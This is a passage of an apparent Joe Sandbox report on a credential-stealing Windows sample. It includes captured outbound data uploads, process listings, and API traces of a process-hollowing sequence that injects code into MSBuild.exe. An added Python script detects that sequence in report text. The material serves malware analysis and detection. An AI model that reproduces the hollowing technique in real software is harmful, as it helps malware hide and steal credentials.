                                                                                                        Data Ascii: _z )`"yDe\^s+Fh!C##0u^~ESc 7Ba5*<Dt[@|M5"5*}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~*x6m^*|.To(1 8p
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 27 b3 34 f0 d0 5c cc b8 75 6e 5d 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06 7f 14 fa 8e 0e 85 f5 88 b6 1e 48 af 0f a3 50 eb 70 99 b6 3f a6
                                                                                                        Data Ascii: '4\un]%,un!"__]-CJ BOLy|vyTvs~8kQ*gi0(4RwVf"BM=a)c[eg0'mZFwA*!9-H`l`?DTjtJ24a)*STYHPp?
                                                                                                        2024-12-22 23:12:26 UTC15331OUTData Raw: 1c 2d 07 55 6b f4 36 4b 2a 6e 67 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09 85 17 1a ba 7c f7 ec 67 5f c6 cc 26 6f 2d 41 61 14 2e 83 fc c3
                                                                                                        Data Ascii: -Uk6K*ngzb,ha"C@95mueu5@7O~1zM1j;N"3#I|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?*rHPWv|g_&o-Aa.
                                                                                                        2024-12-22 23:12:29 UTC1147INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:29 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=gn6bu4et9ugokk2s8cfplbn3ei; expires=Thu, 17 Apr 2025 16:59:07 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pEaMkxYul5kxooF%2FgQOhxmv3uIyETeDyHx%2BuM9RXNrp6fupv92%2BsBk%2Fv%2BA%2FgMmu%2FsR5eCEAAm%2B%2FBMs98VlnZ0k9RnyjiiVj%2BCYXice5xcj239ustdU8ZG2jm64rPAZ4Oag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbf4efb0436f-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1723&rtt_var=941&sent=337&recv=599&lost=0&retrans=0&sent_bytes=2831&recv_bytes=570989&delivery_rate=1005856&cwnd=182&unsent_bytes=0&cid=d4dd4f4f05e1d5bf&ts=3762&x=0"



                                                                                                        Target ID:0
                                                                                                        Start time:18:11:57
                                                                                                        Start date:22/12/2024
                                                                                                        Path:C:\Users\user\Desktop\external.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\external.exe"
                                                                                                        Imagebase:0x6f0000
                                                                                                        File size:564'224 bytes
                                                                                                        MD5 hash:88CD76E4609E50C6435EBC4771427D2C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:18:11:57
                                                                                                        Start date:22/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:18:11:57
                                                                                                        Start date:22/12/2024
                                                                                                        Path:C:\Users\user\Desktop\external.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\external.exe"
                                                                                                        Imagebase:0x6f0000
                                                                                                        File size:564'224 bytes
                                                                                                        MD5 hash:88CD76E4609E50C6435EBC4771427D2C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true


                                                                                                          Execution Graph

                                                                                                          Execution Coverage:10.2%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:3.4%
                                                                                                          Total number of Nodes:443
                                                                                                          Total number of Limit Nodes:4

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0072F110,0072F100), ref: 0072F334
                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0072F347
                                                                                                          • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 0072F365
                                                                                                          • ReadProcessMemory.KERNELBASE(00000048,?,0072F154,00000004,00000000), ref: 0072F389
                                                                                                          • VirtualAllocEx.KERNELBASE(00000048,?,?,00003000,00000040), ref: 0072F3B4
                                                                                                          • WriteProcessMemory.KERNELBASE(00000048,00000000,?,?,00000000,?), ref: 0072F40C
                                                                                                          • WriteProcessMemory.KERNELBASE(00000048,00400000,?,?,00000000,?,00000028), ref: 0072F457
                                                                                                          • WriteProcessMemory.KERNELBASE(00000048,?,?,00000004,00000000), ref: 0072F495
                                                                                                          • Wow64SetThreadContext.KERNEL32(0000009C,00BF0000), ref: 0072F4D1
                                                                                                          • ResumeThread.KERNELBASE(0000009C), ref: 0072F4E0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                          • API String ID: 2687962208-3857624555
                                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                          • Instruction ID: a431ce96ab2c276368a4bc9dc47659e982edf90736376f5a984cabb8afdf5592
                                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                          • Instruction Fuzzy Hash: 8DB1F67664068AAFDB60CF68CC80BDA73B5FF88714F158125EA08AB341D774FA51CB94
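The API list above for the function at 0x72f321 is the canonical process-hollowing (RunPE) sequence: CreateProcessW with dwCreationFlags 0x4 (CREATE_SUSPENDED) on a target that the string table identifies as C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Wow64GetThreadContext on the suspended main thread; a 4-byte ReadProcessMemory, consistent with reading the image base out of the child's PEB; VirtualAllocEx with 0x3000 (MEM_COMMIT|MEM_RESERVE) and 0x40 (PAGE_EXECUTE_READWRITE); WriteProcessMemory of headers and sections, one of them at 0x400000, plus a 4-byte write consistent with patching the PEB image base; then Wow64SetThreadContext to repoint the thread and ResumeThread. What follows is an added Python example and not part of the Joe Sandbox report or of the sample's code: it parses API-call lines in the format the report prints, decodes the raw flag constants, and flags the ordered sequence. The embedded sample trace is copied from the ten lines above; the findings-dict field names and the function names are this example's own. Two caveats a practitioner would want: the check is order-sensitive by design (a ResumeThread before any remote write is not hollowing), and on a live host the corroborating artefact is that the image mapped at 0x400000 inside the MSBuild.exe process no longer matches the file on disk.

```python
import re

# Win32 constants (winbase.h / winnt.h) used to decode the raw arguments.
CREATE_SUSPENDED = 0x00000004
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x40
ALLOC_FLAGS = {MEM_COMMIT: "MEM_COMMIT", MEM_RESERVE: "MEM_RESERVE"}
CREATION_FLAGS = {CREATE_SUSPENDED: "CREATE_SUSPENDED"}

# Sample input: the ten API-call lines reported for the function at 0x72f321,
# copied from the sandbox report. "ref:" is the call-site address; "?" marks an
# argument the sandbox could not recover.
SAMPLE_TRACE = """\
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0072F110,0072F100), ref: 0072F334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0072F347
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 0072F365
ReadProcessMemory.KERNELBASE(00000048,?,0072F154,00000004,00000000), ref: 0072F389
VirtualAllocEx.KERNELBASE(00000048,?,?,00003000,00000040), ref: 0072F3B4
WriteProcessMemory.KERNELBASE(00000048,00000000,?,?,00000000,?), ref: 0072F40C
WriteProcessMemory.KERNELBASE(00000048,00400000,?,?,00000000,?,00000028), ref: 0072F457
WriteProcessMemory.KERNELBASE(00000048,?,?,00000004,00000000), ref: 0072F495
Wow64SetThreadContext.KERNEL32(0000009C,00BF0000), ref: 0072F4D1
ResumeThread.KERNELBASE(0000009C), ref: 0072F4E0
"""

# One call per line:  Api.Module(arg,arg,...), ref: ADDR   (arguments optional)
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


def decode_flags(value, table):
    """Render a bit-flag value as 'NAME|NAME'; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    rest = value & ~known
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def parse_call(line):
    """Parse one report line into {'api', 'module', 'args', 'ref'}; None if no match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def parse_trace(text):
    return [c for c in (parse_call(l) for l in text.splitlines() if l.strip()) if c]


def detect_hollowing(calls):
    """Look for CreateProcess*(CREATE_SUSPENDED) -> WriteProcessMemory (1+)
    -> [Wow64]SetThreadContext -> ResumeThread, in that order, all against the
    same target process handle. Returns a findings dict; 'verdict' is
    'process_hollowing' or 'none'."""
    f = {"verdict": "none", "write_refs": [], "write_bases": [],
         "rwx_alloc_ref": None, "target_handle": None}
    stage = 0  # 0 nothing, 1 suspended child, 2 remote write, 3 context set
    for c in calls:
        api, args, ref = c["api"], c["args"], c["ref"]
        if stage == 0:
            # dwCreationFlags is the 6th argument of CreateProcessA/W.
            if api in ("CreateProcessW", "CreateProcessA") and len(args) > 5 \
                    and args[5] is not None and args[5] & CREATE_SUSPENDED:
                f["create_suspended_ref"] = ref
                f["creation_flags"] = decode_flags(args[5], CREATION_FLAGS)
                stage = 1
            continue
        if api == "VirtualAllocEx" and len(args) >= 5:
            f["target_handle"] = args[0]
            if args[3] is not None:
                f["alloc_type"] = decode_flags(args[3], ALLOC_FLAGS)
            if args[4] == PAGE_EXECUTE_READWRITE:
                f["rwx_alloc_ref"] = ref
        elif api == "WriteProcessMemory" and args:
            if f["target_handle"] is None:
                f["target_handle"] = args[0]
            if args[0] == f["target_handle"]:
                f["write_refs"].append(ref)
                if len(args) > 1 and args[1] is not None:
                    f["write_bases"].append(args[1])  # lpBaseAddress in the child
                stage = max(stage, 2)
        elif stage >= 2 and api in ("SetThreadContext", "Wow64SetThreadContext"):
            f["set_context_ref"] = ref
            stage = 3
        elif stage >= 3 and api == "ResumeThread":
            f["resume_ref"] = ref
            f["verdict"] = "process_hollowing"
            break
    return f


if __name__ == "__main__":
    for key, val in detect_hollowing(parse_trace(SAMPLE_TRACE)).items():
        print(f"{key}: {val}")
```

The same parser accepts the argument-less form the report uses elsewhere (for example `ExitProcess.KERNEL32 ref: 0070CB01`), so the detector can be run over every APIs block in a report, not only this one.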

                                                                                                          Control-flow Graph (0x7140f9-0x7141c2; nodes marked executed / not executed; calls LoadLibraryExW, GetLastError, FreeLibrary and the internal routine at 0x7176c1)
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,48E58DFA,?,00714208,006F3E32,?,00000000,?), ref: 007141BA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                          • API String ID: 3664257935-537541572
                                                                                                          • Opcode ID: 5e6220a47ca8c076436b9cb33a8858b9d6029a0a9a7dadcceeedcf6bfd687558
                                                                                                          • Instruction ID: d9aa79ed245f5da9ec4e09976854cc6050ad832fd8d1abb41f446a70aa9773f8
                                                                                                          • Opcode Fuzzy Hash: 5e6220a47ca8c076436b9cb33a8858b9d6029a0a9a7dadcceeedcf6bfd687558
                                                                                                          • Instruction Fuzzy Hash: 24210272A00219FBD7319B6CEC45ADA3768DB617A0B344220FD02A72D1E63CEEC1D690

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                                          • String ID:
                                                                                                          • API String ID: 1378416451-0
                                                                                                          • Opcode ID: cc705a4b79f6efbf5b12e02867ae5374e74948cc3806c233c1d4bcf5d72d77ad
                                                                                                          • Instruction ID: a7f55f3941d666ff9706f97a541fa08e078295983fab39ff5cc6b1fc89209e16
                                                                                                          • Opcode Fuzzy Hash: cc705a4b79f6efbf5b12e02867ae5374e74948cc3806c233c1d4bcf5d72d77ad
                                                                                                          • Instruction Fuzzy Hash: CC71BFB0D04248CFDB50EFA8D5887ADBBF1BF09344F10842AE899AB355D734A945CF96

                                                                                                          Control-flow Graph (0x6f8730-0x6f8f2c; nodes marked executed / not executed; internal calls to 0x6f6a80, 0x711170, 0x710ca4, 0x6f49d0, 0x6f6aa0, 0x6f4a00, 0x6f6bb0, 0x6f6c50, 0x6f6c10, 0x6f6c70, 0x6f6d80, 0x6f6db0, 0x6f92f0, 0x6f1dc0, 0x6f6ee0, 0x6f6dd0, 0x6f6f00, 0x6f6f80, 0x6f7010, 0x6f1e70 and 0x702303)
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcspn
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3709121408-2766056989
                                                                                                          • Opcode ID: c7af82fd3bac9b7b15a1be9194e777d64f73765121b2be7be8f3fa6c226d3602
                                                                                                          • Instruction ID: 99eef2e9ded0b1b46f1aadd5ec1ca828e065befd7829f82bacf4677e60305ee8
                                                                                                          • Opcode Fuzzy Hash: c7af82fd3bac9b7b15a1be9194e777d64f73765121b2be7be8f3fa6c226d3602
                                                                                                          • Instruction Fuzzy Hash: 6232C3B49052698FCB14DF28C981AEDBBF1BF48300F0585DAE989A7351D734AE85CF91

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleFreeProtectVirtual
                                                                                                          • String ID: @
                                                                                                          • API String ID: 621788221-2766056989
                                                                                                          • Opcode ID: b8052cee7bec4dffcbcffb5b3d4ae5306ef7feead36326af2957320c8e9b94e7
                                                                                                          • Instruction ID: cfafc5cf74df654f09018f15e40d34c4df05d035fd70f18b5dbdc15248618941
                                                                                                          • Opcode Fuzzy Hash: b8052cee7bec4dffcbcffb5b3d4ae5306ef7feead36326af2957320c8e9b94e7
                                                                                                          • Instruction Fuzzy Hash: 1941EFB0900208DFDB04DFA9D8946AEBBF1EF48354F108429E858AB351D779A984CF95

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(0070C9E4,?,0070CB99,00000000,?,?,0070C9E4,48E58DFA,?,0070C9E4), ref: 0070CAE8
                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0070CB99,00000000,?,?,0070C9E4,48E58DFA,?,0070C9E4), ref: 0070CAEF
                                                                                                          • ExitProcess.KERNEL32 ref: 0070CB01
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1703294689-0
                                                                                                          • Opcode ID: adf98f0d43bf55f5201f4648a19a635eb37be05197d02c51d775a2d43233b7ea
                                                                                                          • Instruction ID: 3d7d0f6b987c7f5180aa20b9f9ddc2c1d7772ec0d31600c7a1ed578108cb79f0
                                                                                                          • Opcode Fuzzy Hash: adf98f0d43bf55f5201f4648a19a635eb37be05197d02c51d775a2d43233b7ea
                                                                                                          • Instruction Fuzzy Hash: 92D09E7110010CEBCF26AF60DC0D8893FAAEF40351B04C211B949561B1DF799D93DA44

                                                                                                          Control-flow Graph (0x704cf2-0x704e1f; nodes marked executed / not executed; internal calls to 0x702303, 0x7053c3, 0x704915 and 0x71088d)
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 0-2011850372
                                                                                                          • Opcode ID: 7fc8182b1e413a14ea73e2eb1caefd49863e6fc410e9f428675dab6a255dbf4e
                                                                                                          • Instruction ID: 76b229d86481a1717abd380890e4acedb8903b43b69ef7784678f9dd13958341
                                                                                                          • Opcode Fuzzy Hash: 7fc8182b1e413a14ea73e2eb1caefd49863e6fc410e9f428675dab6a255dbf4e
                                                                                                          • Instruction Fuzzy Hash: 40418171A0011AEBCF14DFA8C4949EDB7F9FF08314B544269E641E7690E734E951CBA0

                                                                                                          Control-flow Graph

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 0-2011850372

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00702B03: GetModuleHandleExW.KERNEL32(00000002,00000000,006FE5B1,?,?,00702AC6,?,?,00702A97,?,?,?,006FE5B1), ref: 00702B0F
                                                                                                          • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,48E58DFA,?,?,?,00723374,000000FF), ref: 00702BF9
                                                                                                            • Part of subcall function 006FB920: std::_Throw_Cpp_error.LIBCPMT ref: 006FB94C
                                                                                                            • Part of subcall function 006FB920: std::_Throw_Cpp_error.LIBCPMT ref: 006FB968
                                                                                                            • Part of subcall function 00705C60: ReleaseSRWLockExclusive.KERNEL32(?,?,?,006FB9E9,?,006FFD92), ref: 00705C75
                                                                                                          Strings
                                                                                                          Similarity
